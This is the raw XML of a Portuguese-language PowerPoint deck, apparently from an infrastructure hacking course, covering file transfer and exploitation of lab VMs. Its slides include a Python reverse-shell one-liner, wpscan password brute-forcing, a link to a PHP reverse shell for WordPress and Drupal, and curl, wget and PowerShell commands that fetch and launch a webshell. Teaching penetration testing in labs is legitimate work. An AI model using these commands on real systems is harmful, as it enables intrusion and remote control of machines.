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4" r:id="rId5"/>
    <p:sldMasterId id="2147483688" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="27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E08035-DF04-465F-A54B-8DE02DDBAD40}" v="34" dt="2020-11-29T13:13:06.529"/>
    <p1510:client id="{40959B05-BF34-4416-90A2-D125A52B0F30}" v="8" dt="2020-11-30T11:00:35.682"/>
    <p1510:client id="{7449F8EF-AC0C-428C-93D4-5DF01A4D9BA0}" v="2" dt="2020-11-29T09:55:37.489"/>
    <p1510:client id="{7720B148-5AE0-4F60-950D-BE44AFA46BB0}" v="20" dt="2020-11-26T10:33:45.245"/>
    <p1510:client id="{7F40795A-8552-44C4-A111-147885FAE32D}" v="2" dt="2020-11-26T11:33:08.0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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7449F8EF-AC0C-428C-93D4-5DF01A4D9BA0}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7449F8EF-AC0C-428C-93D4-5DF01A4D9BA0}" dt="2020-11-29T09:55:37.489" v="1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7449F8EF-AC0C-428C-93D4-5DF01A4D9BA0}" dt="2020-11-29T09:55:37.477" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1625660626" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7449F8EF-AC0C-428C-93D4-5DF01A4D9BA0}" dt="2020-11-29T09:55:37.477" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1625660626" sldId="264"/>
            <ac:spMk id="12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40959B05-BF34-4416-90A2-D125A52B0F30}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{40959B05-BF34-4416-90A2-D125A52B0F30}" dt="2020-11-30T11:00:35.682" v="7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40959B05-BF34-4416-90A2-D125A52B0F30}" dt="2020-11-30T11:00:35.682" v="6" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="337654157" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{40959B05-BF34-4416-90A2-D125A52B0F30}" dt="2020-11-30T11:00:35.682" v="6" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="337654157" sldId="268"/>
            <ac:spMk id="5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7F40795A-8552-44C4-A111-147885FAE32D}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7F40795A-8552-44C4-A111-147885FAE32D}" dt="2020-11-26T11:33:08.016" v="1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7F40795A-8552-44C4-A111-147885FAE32D}" dt="2020-11-26T11:33:08.016" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="22340784" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7F40795A-8552-44C4-A111-147885FAE32D}" dt="2020-11-26T11:33:08.016" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="22340784" sldId="263"/>
            <ac:spMk id="12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7720B148-5AE0-4F60-950D-BE44AFA46BB0}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7720B148-5AE0-4F60-950D-BE44AFA46BB0}" dt="2020-11-26T10:33:45.245" v="19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7720B148-5AE0-4F60-950D-BE44AFA46BB0}" dt="2020-11-26T10:33:45.245" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1352676120" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{7720B148-5AE0-4F60-950D-BE44AFA46BB0}" dt="2020-11-26T10:33:45.245" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1352676120" sldId="262"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{23E08035-DF04-465F-A54B-8DE02DDBAD40}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{23E08035-DF04-465F-A54B-8DE02DDBAD40}" dt="2020-11-29T13:13:06.389" v="31" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{23E08035-DF04-465F-A54B-8DE02DDBAD40}" dt="2020-11-29T13:13:06.389" v="30" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="504048331" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{23E08035-DF04-465F-A54B-8DE02DDBAD40}" dt="2020-11-29T13:13:01.701" v="20" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="504048331" sldId="267"/>
            <ac:spMk id="5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23E08035-DF04-465F-A54B-8DE02DDBAD40}" dt="2020-11-29T13:06:21.737" v="11" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="504048331" sldId="267"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{23E08035-DF04-465F-A54B-8DE02DDBAD40}" dt="2020-11-29T13:13:06.389" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="504048331" sldId="267"/>
            <ac:spMk id="14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free-powerpoint-templates-design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5373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219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172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2686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333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2404412" y="4512734"/>
            <a:ext cx="6858000" cy="135421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Curso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 Hacking para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Infraestruturas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redes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Shay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Alfasi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Tradu</a:t>
            </a:r>
            <a:r>
              <a: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ção: Luli Rosenberg &amp; Helton Wernik</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="he-I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852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14118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1068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2030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2795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9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97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פריסה מותאמת אישי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מציין מיקום של כותרת תחתונה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מציין מיקום של מספר שקופית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7791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3124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49005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2883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19944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8576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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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e-IL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קורס פייתון בהייטק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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40930928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2192000" cy="1179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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1536701"/>
            <a:ext cx="10972800" cy="45259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</a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3733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Widescreen 16:9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20520470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3909B8-E3E9-45EE-8E83-AAB7214F9F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70CEC7D-E50A-4708-B711-7F637F4F7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3B80D5-95C8-42BF-B148-D8F015419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631D5C-2E96-407B-9626-BB8115C1F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A48109-78E8-4707-86E0-9E274DFBA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6470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24DB9F-2FE7-4ACD-9EC2-1D48E4890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1830AFE-BC40-419A-8058-4A21ECB94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43730C7-0F1F-4F16-8FB7-7E0BEDF51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D8655D-C1AA-4BC7-8D9C-71902F670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248E8E8-8432-4460-8065-F43C82786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1359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786F70-C5B2-490C-801C-815680497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D0A7892-301C-4747-8FDE-193D934A04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8C3F3FE-A27E-4B08-BCDC-2C50C16AB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D3AF63B-25C9-42DE-AF07-379C1673D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FAA5DB0-188F-43FF-8AD8-0FBACAA8B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43053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04877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86E458-3759-4991-BA68-792EC4491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7003B2E-87F6-4FEC-9B41-9DDD6DA09A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B535837-95D6-49B5-B9C3-C19B43AC16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D65013F-DCB4-47EB-AC0A-F96FF0E884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5D977B8-B4DF-4A8B-B0E9-8D8DF3B3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78E4EBB-1049-470A-AA65-29F93ED22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61057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3F68F79-7DE3-4283-A93D-417315B8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B77E55-6186-4F2D-9717-4D0701E93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566826C-05BC-4D82-B631-D3C01FE5C1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A59637D-19A2-4022-8867-D3E685CD24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E38FE82-E95A-43BD-B386-D13FB19474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E646480-DCE7-4F4D-8975-DE250B3DF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E39AEFE7-4E7A-479B-87DB-9FA1E4422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AC54ED0F-7825-4B5A-8F24-4BB519595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6884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4BB5C1-094A-414A-B521-EBCB8F770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860B32AD-1EFA-4B8B-A12B-AE5FCFCE1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3E8CC34-9A66-4E29-9E6F-BF49A2DA1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13C0A6B-067A-48F3-BDFB-F7EB7C969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7576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C722E07B-F515-444B-940D-6404481F1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CBA3E80-66E8-4960-9E2A-61A3646CB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EE0548D-1B31-401B-B445-A04084A0F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6300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5F41F0-F250-4013-8178-E5FF95A00D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988879A-D29A-47CD-8BE9-890CDD51C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8FA285C-13ED-4F1F-9213-FAA3528B60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F302ED0-9E33-4D20-AAA0-87ECF18BD7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368D203-A310-45E8-AC72-0BD154E2E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EF93592-407E-4D46-9AB5-361B7EC81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56894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79EDBC-03F2-43A4-A9F3-9127D4DD9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56F4CBA-DFC1-40C9-894F-1C2B044240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75795C6-11DF-4699-9D76-E8A7396540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223C833-18F1-4307-97AE-9C4B3B0F7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BCEEA1B-E744-4AE3-9149-835E69B5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A6277C9-B893-4DC8-9948-AE3B6EEDC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98502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1C8D96-F914-4047-85BF-8DFE845AC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FBEE615-F1A0-4E5B-98AB-DF0EB11CB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7089E3-8DEA-433B-9EB6-C3A9121AB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C7E73C-00DA-4D00-B3A6-D8D10F0C6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1BFA6FA-1BA8-4870-90CB-93F314FF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36999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9CFEAD0-66A6-4A22-B945-38149055A6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D65F67-AE46-4807-9A86-0EDAD1C397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BD8240E-9D85-4B3A-8708-0ACD10847A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9E3AEBB-6DE3-4517-BBA4-12559D5FB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16D677D-906C-4DB8-9FC3-A7D9BBE9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3416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032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688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98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1986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2092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534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free-powerpoint-templates-design.com/free-powerpoint-templates-design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E56DE4-9743-457A-9119-581283221591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5EF085-42B5-4935-999D-1DE731459A1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813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4ABF69-6E84-4DDE-9FC7-873BECAFC963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11/30/2020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FDD7A2C-91F1-4004-A171-7F4AB5FF3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597352"/>
            <a:ext cx="12192000" cy="260648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="09091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hlinkClick r:id="rId15"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6560147"/>
            <a:ext cx="7639475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H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" altLang="ko-K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rPr>
              <a:t>acking de Infraestruturas - ITSafe Brasil</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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6332824" y="6560147"/>
            <a:ext cx="5859177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S</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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hay Alfasi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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7637" y="5405415"/>
            <a:ext cx="1854364" cy="1102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78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B1E92A4F-13C2-41DD-8A64-EA28CFD0B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A94B2F2-A688-4B32-B74D-36B85709BF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4BB5D17-7C71-4215-BD3B-AD436B32F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609F-3BC5-42FE-A3AC-970F68DC623A}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>30/11/2020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D0E4851-F857-42F8-9BA3-B76E28C7C7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17EAE7-5E35-4FE1-8A2A-300657F4B2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BD241-1DDC-403E-B95A-6E0B34D0D6DD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47532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ecureAuthCorp/impacket.git" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacket" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://192.168.x.x/Testshare/file.exe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://192.168.x.x/Testshar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hackersonlineclub.com/command-injection-cheatsheet/" TargetMode="Externa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Yr8Ah9syz-59zEC65iXp8unXWvBRwroU/view?usp=sharing" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" TargetMode="Externa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VgqI0AnbLe8jnZ6uoTojxzaAzfZIQTeq/view?usp=sharing&#8203;" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" TargetMode="Externa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5561923"/>
            <a:ext cx="1219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맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127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2880" y="1"/>
            <a:ext cx="2219120" cy="131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5133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2123" y="1960166"/>
            <a:ext cx="11888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https://github.com/SecureAuthCorp/impacket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git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/SecureAuthCorp/impacket.git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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> +x setup.py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pip install -r requirements.txt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Python setup.py install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656722"/>
            <a:ext cx="11289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Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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23" y="3744829"/>
            <a:ext cx="1262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Smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/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3" y="4052164"/>
            <a:ext cx="11888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python smbserver.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TestShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /root/shells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View files on remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\192.168.x.x\Testshare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Copy file from remote server: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Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\192.168.x.x\Testshare\file.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>Remote run:</a:t>
            </a:r>
          </a:p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en-US" dirty="0"/>
              <a:t>\\192.168.x.x\Testshare\file.exe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478972"/>
            <a:ext cx="10220325" cy="896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File Transfers – Windows- SMB Server - Windows transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295694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Exploits e Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3304448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79425"/>
            <a:ext cx="10220325" cy="896938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Exploits And Metasploit – Command injection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123" y="2352052"/>
            <a:ext cx="11888288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python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket,subprocess,os;s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.AF_INET,socket.SOCK_STREAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>192.168.56.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>));os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(),0); os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(),1);os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(),2);import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("/bin/bash")'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2048608"/>
            <a:ext cx="392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Reverse shell com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> de Python: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22" y="3882270"/>
            <a:ext cx="3331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Inj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>eção</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> cheat sheet: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3" y="4167790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https://hackersonlineclub.com/command-injection-cheatsheet/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676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79425"/>
            <a:ext cx="10220325" cy="896938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Exploits And Metasploit – CMS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Fuzzing And Reverse Shell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932" y="1864372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elliot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ER28-0652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932" y="1560928"/>
            <a:ext cx="3922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WordPress – Nome de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>usuário</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>senha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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2" y="3002705"/>
            <a:ext cx="987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Wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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1932" y="3382414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wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://192.168.x.x -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwordList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UsernameList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1932" y="4729778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https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php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267775"/>
            <a:ext cx="1874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PHP Reverse shell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340220"/>
            <a:ext cx="162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Download VM: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353" y="5719929"/>
            <a:ext cx="1188828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https://drive.google.com/file/d/1Yr8Ah9syz-59zEC65iXp8unXWvBRwroU/view?usp=sharing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79425"/>
            <a:ext cx="10220325" cy="896938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Exploits And Metasploit – CMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Drupal  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ReverseShell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2123" y="1960166"/>
            <a:ext cx="1188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admin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password1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1656722"/>
            <a:ext cx="3301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Drupal Username and Password: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23" y="3098499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Php Module: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3" y="3478208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https://www.drupal.org/project/php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2123" y="4825572"/>
            <a:ext cx="11888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https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php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0191" y="4363569"/>
            <a:ext cx="1874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PHP Reverse shell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2123" y="5436014"/>
            <a:ext cx="1620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Download VM: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0191" y="5803383"/>
            <a:ext cx="1188828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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1VgqI0AnbLe8jnZ6uoTojxzaAzfZIQTeq/view?usp=sharing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60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633221" y="1452301"/>
            <a:ext cx="6774730" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Transferência</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Arquivos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639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0" y="479425"/>
            <a:ext cx="10220325" cy="896938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File Transfers – HTTP SSH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2123" y="2352052"/>
            <a:ext cx="1188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curl -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://192.168.x.x/webshell.php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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://192.168.x.x/webshell.php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scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> root@192.168.x.x:/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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2123" y="2048608"/>
            <a:ext cx="2676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Download files with linux:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173168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932" y="1864372"/>
            <a:ext cx="11888288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PowerShell (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('http://192.168.56.101/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php','c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:\windows\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>');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PowerShell (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('http://192.168.56.101/webshell.php','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>');Start-Process '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
